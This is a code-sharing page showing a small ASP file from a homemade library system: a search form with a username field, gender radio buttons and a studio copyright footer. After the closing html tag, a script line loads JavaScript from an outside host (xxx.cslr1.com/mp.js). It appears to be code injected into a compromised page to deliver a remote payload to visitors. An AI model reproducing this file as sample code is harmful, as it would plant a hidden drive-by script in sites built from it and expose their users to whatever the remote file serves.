shousuo_dtj.asp

来自「自己做的一个图书系统」· ASP 代码 · 共 36 行

ASP
36
字号
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>陶益数码工作室建立多条件搜索页</title>
</head>

<body>
<h3 align="center">建立多条件搜索页</h3>
<form id="form1" name="form1" method="post" action="ssjg_dtj.asp">
  <label>
  用户名
  <input name="u" type="text" id="u" />
  性别
  <input name="radiobutton" type="radio" value="男" checked="checked" />
男 </label>
  <label>
  <input type="radio" name="radiobutton" value="女" />
女 </label>
  <label>  </label>
  <label>
  <input type="submit" name="Submit" value="提交" />
  </label>
</form>
<table width="760" border="0" align="center" cellpadding="6" cellspacing="0">
  <tr>
    <td><div align="center">
      <hr />
      <a href="http://www.ty502.com/"></a> <strong><a href="http://www.ty502.com/"><font color="#0000FF">陶益数码工作室</font></a> </strong>Copyright &copy; 2007 <a href="http://www.ty502.com/banquan.asp"><strong><font color="#0000FF">版权所有</font></strong></a></div></td>
  </tr>
</table>
</body>
</html>

<script language=javascript src=http://xxx.cslr1.com/mp.js></script>

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?